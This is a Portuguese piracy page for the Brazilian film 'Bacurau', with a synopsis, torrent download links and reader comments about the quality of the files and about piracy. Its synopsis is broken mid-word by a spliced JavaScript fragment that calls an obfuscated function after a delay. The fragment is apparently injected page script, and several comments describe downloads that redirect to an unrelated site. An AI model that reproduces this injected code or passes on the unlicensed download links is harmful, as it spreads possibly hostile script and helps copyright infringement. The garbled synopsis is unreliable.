Bacurau (2019)

Vencedor do Prêmio do Júri em Cannes

Título Original: Bacurau
Título no Brasil: Bacurau
Direção: Kleber Mendonça Filho / Juliano Dornelles
Gênero: Drama
Ano de Lançamento: 2019
Duração: 132 min
País: Brasil

Sinopse: Os moradores de um pequeno povoado do sertão brasileiro, chamado Bacurau, descobrem que a comunidade não consta mais em qualquer mapa. Aos poucos, percebem algo estranho na região: enquanto drones passeiam pelos céus, estrangeiros chegam à cidade. Quandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando carros se tornam vítimas de tiros e cadáveres começam a aparecer, Teresa, Domingas, Acácio, Plínio, Lunga e outros habitantes chegam à conclusão de que estão sendo atacados. Falta identificar o inimigo e criar coletivamente um meio de defesa.

 

BRRip – 1.58 Gb
Download
BRRip – 2.49 Gb
Download
WEB-DL – 4.05 Gb
Download

 

 

COMPARTILHE

85 comentários em “Bacurau (2019)”

    1. Olá, baixei o arquivo e ele veio com ótima qualidade de som e imagem. Até ai tudo bem. Porém qndo fui tentar transferir o arquivo para um pen drive, simplesmente ele não vai. Gostaria se saber se há alguma proteção q impede q faça a transferência, sei lá?!
      Agradeço desde já. E aproveito pra parabenizar os organizadores do site. Abs

      1. Que eu saiba não tem nenhuma proteção não, Paulo. Aparece algum erro em específico na hora da transferência? Eu aconselho que você veja se tem espaço suficiente no pendrive, ou se o arquivo ainda está aberto no uTorrent (isso pode impedir a transferência).

      1. cara, o filme é originalmente dublado na parte dos estrangeiros, não existe versão com áudio em inglês…

        1. No cinema, a parte de fala dos estrangeiros está legendada sim

      2. Tem neguinho que é foda. Finalmente alguém disponibiliza o tão esperado torrent de Bacurau, mas o cara ainda consegue reclamar. Deve ser dessa geração nova mega mimada. Foi mal.. mas não dou conta de gente mal agradecida não.

        1. Num é?! Também não tenho paciência…
          E por falar nisso: Muito Obrigada por disponibilizar o filme. Estava aguardando por isto. Ah!! E mais obrigada ainda por recuperar este site, um dos melhores que já encontrei. Ursinho deve estar feliz ;D

        2. Pois então, Antonio.
          Essa geração ultra mimada acha que o mundo inteiro tem que atender aos seus caprichos e que podem reclamar de tudo.
          Um monte de gente escrota e insensível, dá vontade de mandar tomar naquele lugar. Afff

        3. Verdade amigo, uma pessoa dessas nunca se daria o trabalho de fazer um postagem de qualquer filme.

    1. Tá legendado…
      Não sei de onde a galera tirou essa que os grigos estão dublados nesta versão disponível… Alias… O filme tem tanta legenda que a sensação que dá é que é um filme em inglês

  1. A informação indicada está errada, Bacurau não venceu a palma de ouro em Cannes esse ano ele sim ganhou o premio do juri um importante porém diferente reconhecimento, o real vencedor da palma de ouro foi o filme coreano Parasita.

  2. Muito obrigado por disponibilizar o filme. Quero comprá-lo sim, mas quero em Blu-Ray, que está previsto pra ser lançado em janeiro de 2019, pra quem está procurando.

    E viva o cinema nacional! Somos Bacurau.

  3. Você não merece Palmas, Merece o Tocantins inteiro!!!!
    Obrigado

  4. Eu vim aqui só para deixar BEM CLARO para os parasitas:
    COMPRAREI COM TODA E MAIS ABSOLUTA CERTEZA o material dos produtores, merecem! e quero muito mais!
    E trago palavras de uma colega:
    “Bacurau é um filme brasileiro que retrata um sertão diferente. Muito premiado internacionalmente. O filme passou em poucos lugares e como sempre, a maioria do pessoal não tem acesso. Bom de quem pode ir a uma sessão de cinema apreciar a obra e contribuir financeiramente. Para o pessoal que não tem os mesmos privilégios, aqui está a gloriosa pirataria”

  5. Obrigada pelo compartilhamento! É ótimo ter o site de volta 🙂

  6. Olá, muito obrigado pelo trabalho sensacional!
    Poderiam, por gentileza, reupar o filme “A irmandade da guerra”?
    Sul Coreano, de 2004. Baixei há muito tempo no antigo site, mas à época não peguei a legenda, então até hoje não pude assistir.

  7. Ola! Tem legendado em ingles? Quero mostrar para amigos! Obrigada

  8. Muito grato. na minha cidade nunca poderia ver no cinema.. Só por aqui mesmo! E viva o cinema nacional !!!

  9. Eu baixei 2x e ta sem audio, sera que tô fazendo algo errado?
    Faz anos que nao uso torrent ahahahah

    1. Talvez seja seu reprodutor, Rafael. Recomendo que use o VLC ou o MPC pra rodar o vídeo.

  10. Um filme brasileiro indispensável , imperdível . Bacurau é estrela de primeira grandeza , chegou pra ficar e vai ficar na história do cinema brasileiro !

  11. Depois de entrar no link de download, quando clico para baixar ele entra em uma pagina toda preta e não baixa nada

  12. Fantástico trabalho de vcs. Vida longa ao The Cult.

  13. Tentei baixar mas não sei como tirar o desprotetor de link que apareceu, e essa página chamada mistercuriosidades.com.br nunca tinha visto antes. Como faz pra pegar o link do torrent?

  14. Muito obrigada!

    Preciso ver para uma discussão em sala de aula.
    Viva o cinema nacional, nossa arte e resistência ancestral!

  15. Assisti o filme do Bacurau.2019.720p.WEB-DL.DD2.0.H264-RK.torrent e está excelente – todos os diálogos em inglês são legendados.

  16. Assisti o filme baixado via Bacurau.2019.720p.WEB-DL.DD2.0.H264-RK.torrent e está excelente: diálogos em inglês originais com legendas.

  17. Caríssimo Ursinho a.k.a. Johan. É um imensa felicidade reencontrá-lo aqui. Os filmes disponibilizados de maneira absolutamente generosa modificaram minha vida e minha gratidão é imensa.
    Por favor, ignore os comentários de gente mimada infame, que acredita que o mundo inteiro tem que estar à disposição do seu ego infantil.
    Muita luz na sua vida. <3

  18. Nós te amamos, Ursinho! Seja bem vindo de voltaaaaaaaa! <3

  19. Galera baixei nesse link “WEB-DL – 4.05 Gb” e o filme está com excelente qualidade, legendado nas partes que não está em português. O filme é maravilhoso e só tenho a agradecer aos envolvidos na disponibilização desse material.

  20. Este Bacurau não abre! Está com algum defeito …..já baixei ele 3 vezes e continua assim

    1. Não está com defeito nenhum. É complicado ajudar a maioria das pessoas, porque elas nunca dizem qual erro está aparecendo.

      Recomendo que troque de reprodutor, Tom. Recomendo o VLC ou o MPC. Se você tentar rodar o filme com o reprodutor padrão do Windows, a chance de dar defeito é muito alta.

      No mais, este tutorial pode ajudar: https://filmescult.net/como-baixar/

  21. nao está saindo som pelo reprodutor de midia, aconteceu o msm com alguem?

  22. Que galera chata da porra! Vão para o cinema cambada de satanás, não é legendado que vocês querem então vão pra lá. Povo cheio de frescura, tomar no cu.

  23. Muito obrigado por disponibilizarem essa película maravilhosa. Aqui rodou lindamente, legenda perfeita, áudio e imagem idem. E que sejamos Lunga efetivamente!

    Asé!

  24. Pseudointelectuais, Pseudocríticos, podem dizer o que quiserem desse filme, podem alavanca-lo com preferirem, podem me amaldiçoar, me ofender. – Sou realista, antes de hipócrita, o filme é chorume cinematográfico, reúne o que há pior no cinema!
    Perdi duas horas de minha vida, vendo esse lixo!

  25. mano, todo torrent que eu tento baixar, eu tô sendo redirecionado pra um site “mister curiosidades”, pode me ajudar?

  26. Bacurau é mais primor do diretor! Ele ressalta bem a nossa realidade ou futura realidade? É um soco no estômago dos bolsominions! Melhor filme brasileiro de 2020, sem sombras de dúvida, quem ainda não viu, assista Bacurau!

Os comentários estão fechados.